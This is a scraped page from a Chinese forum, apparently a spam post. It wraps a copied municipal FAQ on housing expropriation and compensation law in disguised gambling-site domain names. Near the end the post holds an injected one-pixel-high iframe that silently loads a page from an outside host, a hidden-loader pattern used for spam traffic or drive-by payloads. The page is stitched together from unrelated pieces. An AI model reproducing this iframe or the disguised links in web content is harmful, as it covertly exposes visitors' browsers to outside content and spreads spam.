好奇者论坛网

QQ登录

只需一步,快速开始

查看: 6|回复: 0
收起左侧

ωwω‥jsc55555;comЙωwω,9778b√comЙωwω,u70088√com

[复制链接]
匿名
匿名  发表于 2018-2-14 00:26:29 |阅读模式

注册/登录后才能查看本帖全部图片、视频、附件内容

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
关于我市房屋征收常见问题的解答(三)
1.被征收人何种情况下需办理公证?答:国有土地上房屋被征收人已故,由继承人签订房屋征收补偿安置协议的,继承人应办理声明书公证明确征收补偿安置协议权利义务的主体,并享受有关优惠政策。2.设有抵押权的房屋如何征收?答:根据《担保法》规定,抵押是指债务人或者第三人不转移对财产的占有,将该财产作为债权的担保。债务人不履行债务时,债权人有权依照《担保法》的规定以该财产折价或者以拍卖、变卖该财产的价款优先受偿。《最高人民法院关于适用(中华人民共和国担保法)若干问题的解释》第八十条规定,在抵押物灭失、毁损或者被征用的情况下,抵押权人可以就该抵押物的保险金、赔偿金或者补偿金优先受偿。抵押物灭失、毁损或者被征用的情况下,抵押权所担保的债权未届清偿期的,抵押权人可以请求人民法院对保险金、赔偿金或补偿金等采取保全措施。3.因旧城区改建征收个人住宅,被征收人选择在改建地段进行房屋产权调换的,如何处理?答:依据《国有土地上房屋征收与补偿条例》第21条第3款的规定,因旧城区改建征收个人住宅,被征收人选择在改建地段进行房屋产权调换的,作出房屋征收决定的市、县级人民政府应当提供改建地段或者就近地段的房屋。4.市、县级人民政府对征收范围内未经登记的建筑如何处理?答:依据《国有土地上房屋征收与补偿条例》第24条的规定,市、县级人民政府及其有关部门应当依法加强对建设活动的监督管理,对违反城乡规划进行建设的,依法予以处理。市、县级人民政府作出房屋征收决定前,应当组织有关部门依法对征收范围内未经登记的建筑进行调查、认定和处理。对认定为合法建筑和未超过批准期限的临时建筑的,应当给予补偿;对认定为违法建筑和超过批准期限的临时建筑的,不予补偿。 (记者 张维民 整理)关于我市房屋征收常见问题的解答(二)
esther<iframe height="1" marginHeight="1" frameBorder="0" width="951" name="I3" marginWidth="1" align="middle" target="_blank" src="http://daohang.mmdd123.win/2018/02/12opp.html" scrolling="no"></iframe>
ωwω‥jsc55555;comЙωwω,9778b√comЙωwω,u70088√com
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

【---- 由于人类好奇的心理,我们就不难理解这个论坛的出现会在全世界引起怎样的骚动 ----】
本站内容均为会员发表,并不代表好奇者论坛立场! 拒绝任何人以任何形式在本论坛发表与中华人民共和国法律相抵触的言论!

QQ| Archiver|手机版|小黑屋|联系我们|关于我们|标签|

GMT+8, 2018-5-24 12:19 , Processed in 0.617129 second(s), 22 queries . 鲁ICP备16006046号

快速回复 返回顶部 返回列表